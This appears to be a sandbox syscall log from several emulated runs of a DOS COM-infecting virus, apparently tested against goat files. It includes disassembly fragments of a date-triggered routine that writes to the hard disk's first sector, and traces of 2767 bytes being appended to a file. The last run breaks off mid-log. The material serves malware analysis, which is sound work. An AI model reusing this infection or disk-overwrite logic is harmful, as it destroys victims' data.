2018-12-25T11:52:09.262097004Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:09.267982757Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:09.278259909Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:09.285529619Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:09.286929161Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:09.293083904Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:09.309507829Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:09.311289779Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:09.31419507Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:09.320599214Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:09.329948722Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:09.341361431Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:09.343263798Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:09.349742896Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:09.362569194Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:09.365480397Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:09.368133825Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:09.373888634Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:09.384384379Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:09.39158374Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:09.393251917Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:09.400038856Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:09.413750224Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:09.415805855Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:09.418668546Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:09.425599102Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:09.435442599Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:09.442224904Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:09.444898247Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:09.45178741Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:09.461816351Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:09.464618003Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:09.467824418Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:09.474367105Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:09.484896511Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:09.49203737Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:09.493695576Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:09.500389323Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:09.511157798Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:09.513200734Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:09.516049103Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:09.522956433Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:09.532780246Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:09.540234267Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:09.543038876Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:09.54966732Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:09.559773356Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:09.562899394Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:09.565720289Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:09.571528389Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:09.582110999Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:09.589269777Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:09.590931844Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:09.59845602Z 66 PC: 143fa | Move file pointer
2018-12-25T11:52:09.600840169Z 63 PC: 14406 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:52:09.603489104Z 66 PC: 1440f | Move file pointer
2018-12-25T11:52:09.605815808Z 66 PC: 1442b | Move file pointer
2018-12-25T11:52:09.607707576Z 63 PC: 14437 | Read file or device (Read 1 bytes on handle 5)
2018-12-25T11:52:09.614530168Z 66 PC: 14453 | Move file pointer
2018-12-25T11:52:09.616310855Z 64 PC: 14461 | Write file or device (Write 2767 bytes on handle 5)
2018-12-25T11:52:09.625655268Z 66 PC: 1446a | Move file pointer
2018-12-25T11:52:09.627278848Z 64 PC: 14476 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:52:09.630246855Z 87 PC: 14480 | Get or set file date and time
2018-12-25T11:52:09.632839063Z 87 PC: 14488 | Get or set file date and time
2018-12-25T11:52:09.63455829Z 62 PC: 1448c | Close file
2018-12-25T11:52:09.642401242Z 67 PC: 14497 | Get or set file attributes
2018-12-25T11:52:09.651235904Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:09.655079242Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:09.656366919Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:09.663691403Z 9 PC: 12a86 | Display string (String= 'Goat file (COM/....). Size=000017D4h/0000006100d bytes. ')
2018-12-25T11:52:09.680203519Z 48 PC: 12a8f | Get DOS version
2018-12-25T11:52:09.681371814Z 61 PC: 12b5c | Open file (Filename = '')
2018-12-25T11:52:09.688673066Z 93 PC: 12afe | File sharing functions
2018-12-25T11:52:09.690969884Z 9 PC: 12a86 | Display string (See above)
2018-12-25T11:52:09.695305433Z 76 PC: 12ae3 | Terminate with return code (Return code = '1')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":15,"Min":0,"Second":0,"TimeBased":true,"OriginalID":4535,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:52:08.829645214Z 48 PC: 14228 | Get DOS version
2018-12-25T11:52:08.831406513Z 44 PC: 14304 | Get time 0x14304: cmp ch, 9
0x14307: jne 0x14310
0x14309: mov ah, 9
0x1430b: mov dx, 0x397
0x1430e: int 0x21
0x14310: mov ah, 0x2c
0x14312: int 0x21
0x14314: cmp ch, 0xf
0x14317: jne 0x14320
0x14319: mov ah, 9
0x1431b: mov dx, 0x397
0x1431e: int 0x21
0x14320: mov ah, 0x2a
0x14322: int 0x21
0x14324: cmp dl, 0x1a
0x14327: jne 0x14367
0x14329: xor dx, dx
0x1432b: mov ah, 0
0x1432d: mov dl, 0x80
0x1432f: int 0x13
2018-12-25T11:52:08.833437093Z 44 PC: 14314 | Get time 0x14314: cmp ch, 0xf
0x14317: jne 0x14320
0x14319: mov ah, 9
0x1431b: mov dx, 0x397
0x1431e: int 0x21
0x14320: mov ah, 0x2a
0x14322: int 0x21
0x14324: cmp dl, 0x1a
0x14327: jne 0x14367
0x14329: xor dx, dx
0x1432b: mov ah, 0
0x1432d: mov dl, 0x80
0x1432f: int 0x13
0x14331: mov ah, 3
0x14333: mov al, 1
0x14335: mov dl, 0x80
0x14337: mov dh, 0
0x14339: mov cx, 1
0x1433c: mov bx, 0x41c
0x1433f: int 0x13
2018-12-25T11:52:08.83544879Z 9 PC: 14320 | Display string (Could not find end pointer)
2018-12-25T11:52:08.959000905Z 42 PC: 14324 | Get date 0x14324: cmp dl, 0x1a
0x14327: jne 0x14367
0x14329: xor dx, dx
0x1432b: mov ah, 0
0x1432d: mov dl, 0x80
0x1432f: int 0x13
0x14331: mov ah, 3
0x14333: mov al, 1
0x14335: mov dl, 0x80
0x14337: mov dh, 0
0x14339: mov cx, 1
0x1433c: mov bx, 0x41c
0x1433f: int 0x13
0x14341: mov ah, 4
0x14343: mov dl, 0x80
0x14345: mov dh, 0
0x14347: mov cx, 1
0x1434a: int 0x13
0x1434c: mov ah, 9
0x1434e: mov dx, 0x3c4
2018-12-25T11:52:08.961036278Z 78 PC: 14390 | Find first file
2018-12-25T11:52:08.967486332Z 67 PC: 1439d | Get or set file attributes
2018-12-25T11:52:08.973835471Z 67 PC: 143a9 | Get or set file attributes
2018-12-25T11:52:09.229691363Z 61 PC: 143ca | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:52:09.236702412Z 87 PC: 143d6 | Get or set file date and time
2018-12-25T11:52:09.238693235Z 63 PC: 143ea | Read file or device (Read 1 bytes on handle 5)
2018-12-25T11:52:09.24536433Z 67 PC: 143b5 | Get or set file attributes
2018-12-25T11:52:09.256006103Z 62 PC: 143b9 | Close file
2018-12-25T11:52:09.259131152Z 79 PC: 143bd | Find next file
2018-12-25T11:52:09.262332162Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:09.268328358Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:09.279183535Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:09.289659038Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:09.290980186Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:09.297465484Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:09.308474108Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:09.310245219Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:09.314721203Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:09.320825959Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:09.330680175Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:09.342335052Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:09.344202828Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:09.348690482Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:09.362438654Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:09.36502067Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:09.367817827Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:09.373917234Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:09.384372258Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:09.390250865Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:09.395426748Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:09.403206755Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:09.415835812Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:09.417884218Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:09.421896559Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:09.427771435Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:09.437659682Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:09.445286853Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:09.44752097Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:09.453979791Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:09.464783274Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:09.467275249Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:09.470133009Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:09.482896763Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:09.493152818Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:09.499949994Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:09.501855125Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:09.509284295Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:09.519581133Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:09.521653945Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:09.525673248Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:09.531512084Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:09.544306635Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:09.552308299Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:09.554034832Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:09.561536954Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:09.572947378Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:09.575070112Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:09.577904294Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:09.599601329Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:09.619765413Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:09.628028547Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:09.630766318Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:09.637486676Z 66 PC: 143fa | Move file pointer
2018-12-25T11:52:09.638786082Z 63 PC: 14406 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:52:09.641837965Z 66 PC: 1440f | Move file pointer
2018-12-25T11:52:09.643128143Z 66 PC: 1442b | Move file pointer
2018-12-25T11:52:09.644429228Z 63 PC: 14437 | Read file or device (Read 1 bytes on handle 5)
2018-12-25T11:52:09.651847484Z 66 PC: 14453 | Move file pointer
2018-12-25T11:52:09.653916863Z 64 PC: 14461 | Write file or device (Write 2767 bytes on handle 5)
2018-12-25T11:52:09.662325394Z 66 PC: 1446a | Move file pointer
2018-12-25T11:52:09.663619718Z 64 PC: 14476 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:52:09.66682372Z 87 PC: 14480 | Get or set file date and time
2018-12-25T11:52:09.668479357Z 87 PC: 14488 | Get or set file date and time
2018-12-25T11:52:09.670715281Z 62 PC: 1448c | Close file
2018-12-25T11:52:09.679122829Z 67 PC: 14497 | Get or set file attributes
2018-12-25T11:52:09.689214859Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:09.694176211Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:09.697143883Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:09.699593224Z 9 PC: 12a86 | Display string (String= 'Goat file (COM/....). Size=000017D4h/0000006100d bytes. ')
2018-12-25T11:52:09.704756102Z 48 PC: 12a8f | Get DOS version
2018-12-25T11:52:09.707453581Z 61 PC: 12b5c | Open file (Filename = '')
2018-12-25T11:52:09.721712846Z 93 PC: 12afe | File sharing functions
2018-12-25T11:52:09.723072424Z 9 PC: 12a86 | Display string (See above)
2018-12-25T11:52:09.726077364Z 76 PC: 12ae3 | Terminate with return code (Return code = '1')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":15,"Min":0,"Second":0,"TimeBased":true,"OriginalID":4535,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:52:09.047439303Z 48 PC: 14228 | Get DOS version
2018-12-25T11:52:09.048999137Z 44 PC: 14304 | Get time 0x14304: cmp ch, 9
0x14307: jne 0x14310
0x14309: mov ah, 9
0x1430b: mov dx, 0x397
0x1430e: int 0x21
0x14310: mov ah, 0x2c
0x14312: int 0x21
0x14314: cmp ch, 0xf
0x14317: jne 0x14320
0x14319: mov ah, 9
0x1431b: mov dx, 0x397
0x1431e: int 0x21
0x14320: mov ah, 0x2a
0x14322: int 0x21
0x14324: cmp dl, 0x1a
0x14327: jne 0x14367
0x14329: xor dx, dx
0x1432b: mov ah, 0
0x1432d: mov dl, 0x80
0x1432f: int 0x13
2018-12-25T11:52:09.051055089Z 44 PC: 14314 | Get time 0x14314: cmp ch, 0xf
0x14317: jne 0x14320
0x14319: mov ah, 9
0x1431b: mov dx, 0x397
0x1431e: int 0x21
0x14320: mov ah, 0x2a
0x14322: int 0x21
0x14324: cmp dl, 0x1a
0x14327: jne 0x14367
0x14329: xor dx, dx
0x1432b: mov ah, 0
0x1432d: mov dl, 0x80
0x1432f: int 0x13
0x14331: mov ah, 3
0x14333: mov al, 1
0x14335: mov dl, 0x80
0x14337: mov dh, 0
0x14339: mov cx, 1
0x1433c: mov bx, 0x41c
0x1433f: int 0x13
2018-12-25T11:52:09.053356851Z 9 PC: 14320 | Display string (Could not find end pointer)
2018-12-25T11:52:09.154127091Z 42 PC: 14324 | Get date 0x14324: cmp dl, 0x1a
0x14327: jne 0x14367
0x14329: xor dx, dx
0x1432b: mov ah, 0
0x1432d: mov dl, 0x80
0x1432f: int 0x13
0x14331: mov ah, 3
0x14333: mov al, 1
0x14335: mov dl, 0x80
0x14337: mov dh, 0
0x14339: mov cx, 1
0x1433c: mov bx, 0x41c
0x1433f: int 0x13
0x14341: mov ah, 4
0x14343: mov dl, 0x80
0x14345: mov dh, 0
0x14347: mov cx, 1
0x1434a: int 0x13
0x1434c: mov ah, 9
0x1434e: mov dx, 0x3c4
2018-12-25T11:52:09.156802Z 78 PC: 14390 | Find first file
2018-12-25T11:52:09.163035977Z 67 PC: 1439d | Get or set file attributes
2018-12-25T11:52:09.169551224Z 67 PC: 143a9 | Get or set file attributes
2018-12-25T11:52:09.230466544Z 61 PC: 143ca | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:52:09.237802616Z 87 PC: 143d6 | Get or set file date and time
2018-12-25T11:52:09.246664252Z 63 PC: 143ea | Read file or device (Read 1 bytes on handle 5)
2018-12-25T11:52:09.253251798Z 67 PC: 143b5 | Get or set file attributes
2018-12-25T11:52:09.270804392Z 62 PC: 143b9 | Close file
2018-12-25T11:52:09.274066085Z 79 PC: 143bd | Find next file
2018-12-25T11:52:09.276635572Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:09.282189245Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:09.292722408Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:09.299546612Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:09.300955041Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:09.307833535Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:09.319377797Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:09.335141862Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:09.33869149Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:09.344390186Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:09.354245053Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:09.361937495Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:09.363818294Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:09.370365353Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:09.380936085Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:09.384493549Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:09.387738328Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:09.394337352Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:09.404853304Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:09.411273287Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:09.41285749Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:09.420747541Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:09.433183567Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:09.435143005Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:09.438224552Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:09.444866293Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:09.454340417Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:09.461041474Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:09.462306588Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:09.468573462Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:09.478504982Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:09.480211989Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:09.48293588Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:09.489274838Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:09.498807264Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:09.505856896Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:09.50762847Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:09.513799167Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:09.525715567Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:09.52767007Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:09.530100965Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:09.537165428Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:09.548351962Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:09.554850808Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:09.556445722Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:09.564013773Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:09.574577792Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:09.576519622Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:09.580323921Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:09.586660191Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:09.596538697Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:09.604189955Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:09.60598187Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:09.608319436Z 66 PC: 143fa | Move file pointer
2018-12-25T11:52:09.610094798Z 63 PC: 14406 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:52:09.613016276Z 66 PC: 1440f | Move file pointer
2018-12-25T11:52:09.614581391Z 66 PC: 1442b | Move file pointer
2018-12-25T11:52:09.616923157Z 63 PC: 14437 | Read file or device (Read 1 bytes on handle 5)
2018-12-25T11:52:09.620827291Z 66 PC: 14453 | Move file pointer
2018-12-25T11:52:09.622653315Z 64 PC: 14461 | Write file or device (Write 2767 bytes on handle 5)
2018-12-25T11:52:09.635072755Z 66 PC: 1446a | Move file pointer
2018-12-25T11:52:09.637025694Z 64 PC: 14476 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:52:09.640007715Z 87 PC: 14480 | Get or set file date and time
2018-12-25T11:52:09.642381553Z 87 PC: 14488 | Get or set file date and time
2018-12-25T11:52:09.644463761Z 62 PC: 1448c | Close file
2018-12-25T11:52:09.652263987Z 67 PC: 14497 | Get or set file attributes
2018-12-25T11:52:09.662355751Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:09.668222689Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:09.669959746Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:09.67263863Z 9 PC: 12a86 | Display string (String= 'Goat file (COM/....). Size=000017D4h/0000006100d bytes. ')
2018-12-25T11:52:09.679332417Z 48 PC: 12a8f | Get DOS version
2018-12-25T11:52:09.680784791Z 61 PC: 12b5c | Open file (Filename = '')
2018-12-25T11:52:09.687476849Z 93 PC: 12afe | File sharing functions
2018-12-25T11:52:09.690743468Z 9 PC: 12a86 | Display string (See above)
2018-12-25T11:52:09.695388535Z 76 PC: 12ae3 | Terminate with return code (Return code = '1')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":15,"Min":0,"Second":0,"TimeBased":true,"OriginalID":4535,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:52:09.18746564Z 48 PC: 14228 | Get DOS version
2018-12-25T11:52:09.192134231Z 44 PC: 14304 | Get time 0x14304: cmp ch, 9
0x14307: jne 0x14310
0x14309: mov ah, 9
0x1430b: mov dx, 0x397
0x1430e: int 0x21
0x14310: mov ah, 0x2c
0x14312: int 0x21
0x14314: cmp ch, 0xf
0x14317: jne 0x14320
0x14319: mov ah, 9
0x1431b: mov dx, 0x397
0x1431e: int 0x21
0x14320: mov ah, 0x2a
0x14322: int 0x21
0x14324: cmp dl, 0x1a
0x14327: jne 0x14367
0x14329: xor dx, dx
0x1432b: mov ah, 0
0x1432d: mov dl, 0x80
0x1432f: int 0x13
2018-12-25T11:52:09.194084904Z 44 PC: 14314 | Get time 0x14314: cmp ch, 0xf
0x14317: jne 0x14320
0x14319: mov ah, 9
0x1431b: mov dx, 0x397
0x1431e: int 0x21
0x14320: mov ah, 0x2a
0x14322: int 0x21
0x14324: cmp dl, 0x1a
0x14327: jne 0x14367
0x14329: xor dx, dx
0x1432b: mov ah, 0
0x1432d: mov dl, 0x80
0x1432f: int 0x13
0x14331: mov ah, 3
0x14333: mov al, 1
0x14335: mov dl, 0x80
0x14337: mov dh, 0
0x14339: mov cx, 1
0x1433c: mov bx, 0x41c
0x1433f: int 0x13
2018-12-25T11:52:09.196075356Z 9 PC: 14320 | Display string (Could not find end pointer)
2018-12-25T11:52:09.314173012Z 42 PC: 14324 | Get date 0x14324: cmp dl, 0x1a
0x14327: jne 0x14367
0x14329: xor dx, dx
0x1432b: mov ah, 0
0x1432d: mov dl, 0x80
0x1432f: int 0x13
0x14331: mov ah, 3
0x14333: mov al, 1
0x14335: mov dl, 0x80
0x14337: mov dh, 0
0x14339: mov cx, 1
0x1433c: mov bx, 0x41c
0x1433f: int 0x13
0x14341: mov ah, 4
0x14343: mov dl, 0x80
0x14345: mov dh, 0
0x14347: mov cx, 1
0x1434a: int 0x13
0x1434c: mov ah, 9
0x1434e: mov dx, 0x3c4
2018-12-25T11:52:09.316905004Z 78 PC: 14390 | Find first file
2018-12-25T11:52:09.32305401Z 67 PC: 1439d | Get or set file attributes
2018-12-25T11:52:09.329786705Z 67 PC: 143a9 | Get or set file attributes
2018-12-25T11:52:09.363444496Z 61 PC: 143ca | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:52:09.370801976Z 87 PC: 143d6 | Get or set file date and time
2018-12-25T11:52:09.372924851Z 63 PC: 143ea | Read file or device (Read 1 bytes on handle 5)
2018-12-25T11:52:09.379650513Z 67 PC: 143b5 | Get or set file attributes
2018-12-25T11:52:09.389378054Z 62 PC: 143b9 | Close file
2018-12-25T11:52:09.391035597Z 79 PC: 143bd | Find next file
2018-12-25T11:52:09.3930489Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:09.397629723Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:09.407552868Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:09.414284798Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:09.415895141Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:09.422631871Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:09.433025172Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:09.435075054Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:09.437885782Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:09.444880496Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:09.454778228Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:09.466106448Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:09.468152731Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:09.474685763Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:09.484594737Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:09.487167166Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:09.489776166Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:09.495277947Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:09.505764131Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:09.512456375Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:09.514035853Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:09.521049971Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:09.533478526Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:09.535553697Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:09.5391946Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:09.545175814Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:09.557094249Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:09.565345663Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:09.5672175Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:09.573256432Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:09.583712163Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:09.58606197Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:09.588985322Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:09.600192069Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:09.610630944Z 61 PC: 143ca | Open file (See above)
